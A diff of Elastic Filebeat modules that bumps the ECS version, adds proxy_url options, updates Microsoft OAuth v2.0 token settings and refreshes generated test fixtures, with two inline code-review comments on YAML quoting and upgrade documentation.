"rsa.time.event_time": "2020-03-17T19:35:40.000Z", "rsa.time.month": "Mar", "service.type": "juniper", "tags": [ @@ -2371,7 +2209,6 @@ ] }, { - "@timestamp": "2020-04-01T02:38:14.000Z", "event.action": "VPN", "event.code": "kmd", "event.dataset": "juniper.junos", @@ -2386,7 +2223,6 @@ "rsa.internal.messageid": "kmd", "rsa.misc.event_type": "VPN", "rsa.time.day": "1", - "rsa.time.event_time": "2020-04-01T02:38:14.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ 
@@ -2395,7 +2231,6 @@ ] }, { - "@timestamp": "2020-04-15T09:40:49.000Z", "event.code": "sshd", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -2413,7 +2248,6 @@ "rsa.misc.result": "unknown", "rsa.misc.severity": "very-high", "rsa.time.day": "15", - "rsa.time.event_time": "2020-04-15T09:40:49.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -2422,7 +2256,6 @@ ] }, { - "@timestamp": "2020-04-29T16:43:23.000Z", "event.code": "[4279]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -2435,7 +2268,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[4279]", "rsa.time.day": "29", - "rsa.time.event_time": "2020-04-29T16:43:23.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -2444,7 +2276,6 @@ ] }, { - "@timestamp": "2020-05-13T23:45:57.000Z", "event.action": "SNMPD_TRAP_QUEUE_DRAINED", "event.code": "SNMPD_TRAP_QUEUE_DRAINED", "event.dataset": "juniper.junos", @@ -2464,7 +2295,6 @@ "rsa.misc.event_type": "SNMPD_TRAP_QUEUE_DRAINED", "rsa.misc.obj_name": "vel", "rsa.time.day": "13", - "rsa.time.event_time": "2020-05-13T23:45:57.000Z", "rsa.time.month": "May", "service.type": "juniper", "tags": [ @@ -2473,7 +2303,6 @@ ] }, { - "@timestamp": "2020-05-28T06:48:31.000Z", "event.code": "[4837]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -2486,7 +2315,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[4837]", "rsa.time.day": "28", - "rsa.time.event_time": "2020-05-28T06:48:31.000Z", "rsa.time.month": "May", "service.type": "juniper", "tags": [ @@ -2495,7 +2323,6 @@ ] }, { - "@timestamp": "2020-06-11T13:51:06.000Z", "event.action": "piciatis", "event.code": "TFTPD_RECVCOMPLETE_INFO", "event.dataset": "juniper.junos", @@ -2516,7 +2343,6 @@ "rsa.internal.messageid": "TFTPD_RECVCOMPLETE_INFO", "rsa.misc.event_type": "piciatis", "rsa.time.day": "11", - "rsa.time.event_time": "2020-06-11T13:51:06.000Z", "rsa.time.month": "Jun", "service.type": "juniper", "tags": [ 
@@ -2525,7 +2351,6 @@ ] }, { - "@timestamp": "2020-06-25T20:53:40.000Z", "event.code": "usp_trace_ipc_reconnect", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -2541,7 +2366,6 @@ "rsa.internal.messageid": "usp_trace_ipc_reconnect", "rsa.misc.node": "usp_trace_ipc_reconnect", "rsa.time.day": "25", - "rsa.time.event_time": "2020-06-25T20:53:40.000Z", "rsa.time.month": "Jun", "service.type": "juniper", "tags": [ @@ -2550,7 +2374,6 @@ ] }, { - "@timestamp": "2020-07-10T03:56:14.000Z", "event.code": "BCHIP", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -2566,7 +2389,6 @@ "rsa.internal.messageid": "BCHIP", "rsa.misc.device_name": "IFP trace> BCHIP:", "rsa.time.day": "10", - "rsa.time.event_time": "2020-07-10T03:56:14.000Z", "rsa.time.month": "Jul", "service.type": "juniper", "tags": [ @@ -2575,7 +2397,6 @@ ] }, { - "@timestamp": "2020-07-24T10:58:48.000Z", "event.action": "moditemp", "event.code": "RPD_MPLS_LSP_DOWN", "event.dataset": "juniper.junos", @@ -2596,7 +2417,6 @@ "rsa.misc.result": "unknown", "rsa.network.interface": "eth2042", "rsa.time.day": "24", - "rsa.time.event_time": "2020-07-24T10:58:48.000Z", "rsa.time.month": "Jul", "service.type": "juniper", "tags": [ @@ -2605,7 +2425,6 @@ ] }, { - "@timestamp": "2020-08-07T18:01:23.000Z", "event.action": "uatDuisa", "event.code": "CHASSISD_PARSE_INIT", "event.dataset": "juniper.junos", @@ -2624,7 +2443,6 @@ "rsa.internal.messageid": "CHASSISD_PARSE_INIT", "rsa.misc.event_type": "uatDuisa", "rsa.time.day": "7", - "rsa.time.event_time": "2020-08-07T18:01:23.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -2633,7 +2451,6 @@ ] }, { - "@timestamp": "2020-08-22T01:03:57.000Z", "event.action": "upidatat", "event.code": "RMOPD_ROUTING_INSTANCE_NO_INFO", "event.dataset": "juniper.junos", 
@@ -2653,7 +2470,6 @@ "rsa.misc.event_type": "upidatat", "rsa.misc.result": "failure", "rsa.time.day": "21", - "rsa.time.event_time": "2020-08-22T01:03:57.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -2662,7 +2478,6 @@ ] }, { - "@timestamp": "2020-09-05T08:06:31.000Z", "event.action": "CHASSISD_TERM_SIGNAL:", "event.code": "CHASSISD_TERM_SIGNAL", "event.dataset": "juniper.junos", @@ -2682,7 +2497,6 @@ "rsa.misc.pid": "4305", "rsa.misc.result": "success", "rsa.time.day": "5", - "rsa.time.event_time": "2020-09-05T08:06:31.000Z", "rsa.time.month": "Sep", "service.type": "juniper", "tags": [ @@ -2691,7 +2505,6 @@ ] }, { - "@timestamp": "2020-09-19T15:09:05.000Z", "destination.ip": [ "10.49.190.163" ], @@ -2720,7 +2533,6 @@ "rsa.misc.result": "failure", "rsa.network.interface": "lo50", "rsa.time.day": "19", - "rsa.time.event_time": "2020-09-19T15:09:05.000Z", "rsa.time.month": "Sep", "service.type": "juniper", "tags": [ @@ -2729,7 +2541,6 @@ ] }, { - "@timestamp": "2020-10-03T22:11:40.000Z", "event.code": "[6968]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -2742,7 +2553,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[6968]", "rsa.time.day": "3", - "rsa.time.event_time": "2020-10-03T22:11:40.000Z", "rsa.time.month": "Oct", "service.type": "juniper", "tags": [ @@ -2751,7 +2561,6 @@ ] }, { - "@timestamp": "2020-10-18T05:14:14.000Z", "destination.ip": [ "10.101.99.109" ], @@ -2778,7 +2587,6 @@ "rsa.misc.result": "success", "rsa.network.interface": "eth4282", "rsa.time.day": "18", - "rsa.time.event_time": "2020-10-18T05:14:14.000Z", "rsa.time.month": "Oct", "service.type": "juniper", "tags": [ @@ -2787,7 +2595,6 @@ ] }, { - "@timestamp": "2020-11-01T12:16:48.000Z", "event.action": "con", "event.code": "RPD_RDISC_NOMULTI", "event.dataset": "juniper.junos", 
@@ -2809,7 +2616,6 @@ "rsa.misc.result": "unknown", "rsa.network.interface": "lo7449", "rsa.time.day": "1", - "rsa.time.event_time": "2020-11-01T12:16:48.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -2818,7 +2624,6 @@ ] }, { - "@timestamp": "2020-11-15T19:19:22.000Z", "event.action": "isquames", "event.code": "BOOTPD_NEW_CONF", "event.dataset": "juniper.junos", @@ -2836,7 +2641,6 @@ "rsa.internal.messageid": "BOOTPD_NEW_CONF", "rsa.misc.event_type": "isquames", "rsa.time.day": "15", - "rsa.time.event_time": "2020-11-15T19:19:22.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -2845,7 +2649,6 @@ ] }, { - "@timestamp": "2020-11-30T02:21:57.000Z", "event.action": "ngelit", "event.code": "SNMP_TRAP_LINK_DOWN", "event.dataset": "juniper.junos", @@ -2868,7 +2671,6 @@ "rsa.misc.result_code": "ons", "rsa.network.interface": "lo3193", "rsa.time.day": "30", - "rsa.time.event_time": "2020-11-30T02:21:57.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -2877,7 +2679,6 @@ ] }, { - "@timestamp": "2020-12-14T09:24:31.000Z", "event.action": "udexerci", "event.code": "MIB2D_ATM_ERROR", "event.dataset": "juniper.junos", @@ -2896,7 +2697,6 @@ "rsa.misc.event_type": "udexerci", "rsa.misc.result": "failure", "rsa.time.day": "14", - "rsa.time.event_time": "2020-12-14T09:24:31.000Z", "rsa.time.month": "Dec", "service.name": "voluptat", "service.type": "juniper", diff --git a/x-pack/filebeat/module/juniper/netscreen/config/input.yml b/x-pack/filebeat/module/juniper/netscreen/config/input.yml index 8316e26b292..67a98eb5b2f 100644 --- a/x-pack/filebeat/module/juniper/netscreen/config/input.yml +++ b/x-pack/filebeat/module/juniper/netscreen/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 
diff --git a/x-pack/filebeat/module/juniper/netscreen/test/generated.log-expected.json b/x-pack/filebeat/module/juniper/netscreen/test/generated.log-expected.json index 69e0e3b6122..ce020c94c5f 100644 --- a/x-pack/filebeat/module/juniper/netscreen/test/generated.log-expected.json +++ b/x-pack/filebeat/module/juniper/netscreen/test/generated.log-expected.json @@ -1353,8 +1353,8 @@ "observer.type": "Firewall", "observer.vendor": "Juniper", "related.ip": [ - "10.154.16.147", - "10.142.21.251" + "10.142.21.251", + "10.154.16.147" ], "rsa.internal.messageid": "00625", "rsa.misc.hardware_id": "ute", diff --git a/x-pack/filebeat/module/juniper/srx/config/srx.yml b/x-pack/filebeat/module/juniper/srx/config/srx.yml index 021eca1c964..0e7488d3da8 100644 --- a/x-pack/filebeat/module/juniper/srx/config/srx.yml +++ b/x-pack/filebeat/module/juniper/srx/config/srx.yml @@ -28,4 +28,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/microsoft/_meta/config.yml b/x-pack/filebeat/module/microsoft/_meta/config.yml index ee06eea9228..a168b621ba5 100644 --- a/x-pack/filebeat/module/microsoft/_meta/config.yml +++ b/x-pack/filebeat/module/microsoft/_meta/config.yml @@ -25,7 +25,11 @@ #var.oauth2.client.secret: "" # Oauth Token URL, should include the tenant ID - #var.oauth2.token_url: "https://login.microsoftonline.com/TENANT-ID/oauth2/token" + #var.oauth2.token_url: "https://login.microsoftonline.com/TENANT-ID/oauth2/v2.0/token" + + # Related scopes, default should be included + #var.oauth2.scopes: + # - "https://api.security.microsoft.com/.default" dhcp: enabled: true diff --git a/x-pack/filebeat/module/microsoft/_meta/docs.asciidoc b/x-pack/filebeat/module/microsoft/_meta/docs.asciidoc index 947cf39f1bb..dba51821e53 100644 --- a/x-pack/filebeat/module/microsoft/_meta/docs.asciidoc +++ b/x-pack/filebeat/module/microsoft/_meta/docs.asciidoc 
@@ -49,7 +49,9 @@ Example config: enabled: true var.oauth2.client.id: "123abc-879546asd-349587-ad64508" var.oauth2.client.secret: "980453~-Sg99gedf" - var.oauth2.token_url: "https://login.microsoftonline.com/INSERT-TENANT-ID/oauth2/token" + var.oauth2.token_url: "https://login.microsoftonline.com/INSERT-TENANT-ID/oauth2/v2.0/token" + var.oauth2.scopes: + - "https://api.security.microsoft.com/.default" ---- *`var.oauth2.client.id`*:: @@ -64,6 +66,10 @@ The secret related to the client ID. A predefined URL towards the Oauth2 service for Microsoft. The URL should always be the same with the exception of the Tenant ID that needs to be added to the full URL. +*`var.oauth2.scopes`*:: + +A list of included scopes, should use .default unless different is specified. + [float] ==== 365 Defender ECS fields diff --git a/x-pack/filebeat/module/microsoft/defender_atp/config/atp.yml b/x-pack/filebeat/module/microsoft/defender_atp/config/atp.yml index d1e5c971b80..a5a425cb57d 100644 --- a/x-pack/filebeat/module/microsoft/defender_atp/config/atp.yml +++ b/x-pack/filebeat/module/microsoft/defender_atp/config/atp.yml @@ -9,6 +9,10 @@ auth.oauth2: {{ .oauth2 | tojson }} auth.oauth2.provider: azure auth.oauth2.azure.resource: https://api.securitycenter.windows.com/ +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} + request.url: "https://api.securitycenter.windows.com/api/alerts" request.method: GET request.transforms: @@ -54,4 +58,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/microsoft/defender_atp/manifest.yml b/x-pack/filebeat/module/microsoft/defender_atp/manifest.yml index 1c93e4d277a..2bf5bf65034 100644 --- a/x-pack/filebeat/module/microsoft/defender_atp/manifest.yml +++ b/x-pack/filebeat/module/microsoft/defender_atp/manifest.yml 
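Review bot: In `defender_atp/config/atp.yml` the added `request.proxy_url: {{ .proxy_url }}` renders the user-supplied value as a bare YAML scalar, while `auth.oauth2: {{ .oauth2 | tojson }}` in the same hunk is encoded. A proxy URL whose userinfo or path contains YAML-significant characters could therefore be mis-parsed or truncated; I would write `request.proxy_url: {{ .proxy_url | tojson }}`. The same applies to the identical additions in `m365_defender/config/defender.yml` and `misp/threat/config/input.yml`. A proxy URL can embed credentials, and the docs hunk in this change documents only `var.oauth2.scopes`, so `var.proxy_url` should get its own entry saying the value is to be handled like `var.oauth2.client.secret`.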
@@ -8,6 +8,7 @@ var: - name: tags default: [defender-atp, forwarded] - name: oauth2 + - name: proxy_url ingest_pipeline: ingest/pipeline.yml input: config/atp.yml diff --git a/x-pack/filebeat/module/microsoft/dhcp/config/input.yml b/x-pack/filebeat/module/microsoft/dhcp/config/input.yml index 0e77cbdf491..d7ce60cf2af 100644 --- a/x-pack/filebeat/module/microsoft/dhcp/config/input.yml +++ b/x-pack/filebeat/module/microsoft/dhcp/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/microsoft/m365_defender/config/defender.yml b/x-pack/filebeat/module/microsoft/m365_defender/config/defender.yml index 52ebe56c3b1..4f92d93af7b 100644 --- a/x-pack/filebeat/module/microsoft/m365_defender/config/defender.yml +++ b/x-pack/filebeat/module/microsoft/m365_defender/config/defender.yml @@ -6,8 +6,10 @@ config_version: "2" interval: {{ .interval }} auth.oauth2: {{ .oauth2 | tojson }} -auth.oauth2.provider: azure -auth.oauth2.azure.resource: https://api.securitycenter.windows.com/ + +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.url: "https://api.security.microsoft.com/api/incidents" request.method: GET @@ -54,4 +56,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/microsoft/m365_defender/manifest.yml b/x-pack/filebeat/module/microsoft/m365_defender/manifest.yml index 99f00620d9d..e3524259d08 100644 --- a/x-pack/filebeat/module/microsoft/m365_defender/manifest.yml +++ b/x-pack/filebeat/module/microsoft/m365_defender/manifest.yml @@ -8,6 +8,7 @@ var: - name: tags default: [m365-defender, forwarded] - name: oauth2 + - name: proxy_url ingest_pipeline: ingest/pipeline.yml input: config/defender.yml diff --git a/x-pack/filebeat/module/misp/threat/config/input.yml b/x-pack/filebeat/module/misp/threat/config/input.yml index 488f0a249c0..d3b4d4b6f71 100644 
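Review bot: In `m365_defender/config/defender.yml`, removing `auth.oauth2.provider: azure` and `auth.oauth2.azure.resource` makes the token request depend entirely on what the user puts in `var.oauth2`, and the manifest hunk declares `oauth2` with no default. An existing configuration that still has the old `/oauth2/token` URL and no `scopes` will presumably stop obtaining tokens after upgrade, and for an incident feed that gap is only noticed if someone watches the input's errors. I would add a breaking-change entry (if one is not already present) and an upgrade note beside the example config stating that `var.oauth2.token_url` must be the `/oauth2/v2.0/token` form and `var.oauth2.scopes` must include `https://api.security.microsoft.com/.default`. The `defender_atp` fileset keeps the Azure provider and resource, so the docs should also say these settings apply to `m365_defender` only, assuming that is the intent.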
--- a/x-pack/filebeat/module/misp/threat/config/input.yml +++ b/x-pack/filebeat/module/misp/threat/config/input.yml @@ -6,6 +6,9 @@ interval: {{ .interval }} request.method: POST request.ssl: {{ .ssl | tojson }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.url: {{ .url }} request.timeout: {{ .http_client_timeout }} request.body: {{ .http_request_body | tojson }} @@ -56,4 +59,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/misp/threat/manifest.yml b/x-pack/filebeat/module/misp/threat/manifest.yml index 63e3ef6db6e..312c800901f 100644 --- a/x-pack/filebeat/module/misp/threat/manifest.yml +++ b/x-pack/filebeat/module/misp/threat/manifest.yml @@ -13,6 +13,7 @@ var: default: "60s" - name: url - name: ssl + - name: proxy_url input: config/input.yml ingest_pipeline: ingest/pipeline.json diff --git a/x-pack/filebeat/module/mssql/log/config/config.yml b/x-pack/filebeat/module/mssql/log/config/config.yml index d908ffc950b..1ebfa1a280b 100644 --- a/x-pack/filebeat/module/mssql/log/config/config.yml +++ b/x-pack/filebeat/module/mssql/log/config/config.yml @@ -14,4 +14,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/mysqlenterprise/audit/config/config.yml b/x-pack/filebeat/module/mysqlenterprise/audit/config/config.yml index c62863d5ac8..2cf32816565 100644 --- a/x-pack/filebeat/module/mysqlenterprise/audit/config/config.yml +++ b/x-pack/filebeat/module/mysqlenterprise/audit/config/config.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/netflow/log/config/netflow.yml b/x-pack/filebeat/module/netflow/log/config/netflow.yml index 460b45ee5c9..15e9ea0706e 100644 --- a/x-pack/filebeat/module/netflow/log/config/netflow.yml +++ b/x-pack/filebeat/module/netflow/log/config/netflow.yml 
@@ -36,4 +36,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/netscout/sightline/config/input.yml b/x-pack/filebeat/module/netscout/sightline/config/input.yml index 8174816245b..735ab1cc910 100644 --- a/x-pack/filebeat/module/netscout/sightline/config/input.yml +++ b/x-pack/filebeat/module/netscout/sightline/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/netscout/sightline/test/generated.log-expected.json b/x-pack/filebeat/module/netscout/sightline/test/generated.log-expected.json index 82bf1130e12..f1cbe891897 100644 --- a/x-pack/filebeat/module/netscout/sightline/test/generated.log-expected.json +++ b/x-pack/filebeat/module/netscout/sightline/test/generated.log-expected.json @@ -444,8 +444,8 @@ "observer.type": "DDOS", "observer.vendor": "Netscout", "related.ip": [ - "10.38.77.13", - "10.179.26.34" + "10.179.26.34", + "10.38.77.13" ], "rsa.internal.messageid": "Blocked_Host", "rsa.misc.msgIdPart1": "Blocked", @@ -1147,8 +1147,8 @@ "observer.type": "DDOS", "observer.vendor": "Netscout", "related.ip": [ - "10.163.161.165", - "10.83.23.104" + "10.83.23.104", + "10.163.161.165" ], "rsa.internal.messageid": "Blocked_Host", "rsa.misc.msgIdPart1": "Blocked", @@ -1888,8 +1888,8 @@ "observer.type": "DDOS", "observer.vendor": "Netscout", "related.ip": [ - "10.44.47.27", - "10.179.210.218" + "10.179.210.218", + "10.44.47.27" ], "rsa.internal.messageid": "Blocked_Host", "rsa.misc.msgIdPart1": "Blocked", @@ -2300,8 +2300,8 @@ "observer.type": "DDOS", "observer.vendor": "Netscout", "related.ip": [ - "10.166.90.130", - "10.73.89.189" + "10.73.89.189", + "10.166.90.130" ], "rsa.internal.messageid": "Blocked_Host", "rsa.misc.msgIdPart1": "Blocked", 
diff --git a/x-pack/filebeat/module/o365/audit/config/input.yml b/x-pack/filebeat/module/o365/audit/config/input.yml index 11c7be4fc70..a0df5d4578a 100644 --- a/x-pack/filebeat/module/o365/audit/config/input.yml +++ b/x-pack/filebeat/module/o365/audit/config/input.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log-expected.json b/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log-expected.json index 04d66f454bc..5c77c57a26b 100644 --- a/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log-expected.json @@ -62,6 +62,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -132,6 +133,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -202,6 +204,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", 
@@ -272,6 +275,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", diff --git a/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log-expected.json b/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log-expected.json index 4a6f14974fc..dc9605ee5a7 100644 --- a/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log-expected.json @@ -70,6 +70,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -148,6 +149,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -226,6 +228,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", 
@@ -304,6 +307,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -383,6 +387,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -461,6 +466,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -539,6 +545,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -618,6 +625,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", 
@@ -696,6 +704,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -774,6 +783,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -852,6 +862,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", diff --git a/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log-expected.json b/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log-expected.json index 504cc25e971..7aa2f353396 100644 --- a/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log-expected.json @@ -48,6 +48,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -100,6 +101,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -152,6 +154,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, 
@@ -204,6 +207,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -256,6 +260,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -324,6 +329,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0", "user_agent.os.full": "Mac OS X 10.14", @@ -400,6 +406,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0", "user_agent.os.full": "Mac OS X 10.14", @@ -477,6 +484,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0", "user_agent.os.full": "Mac OS X 10.14", @@ -554,6 +562,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0", "user_agent.os.full": "Mac OS X 10.14", 
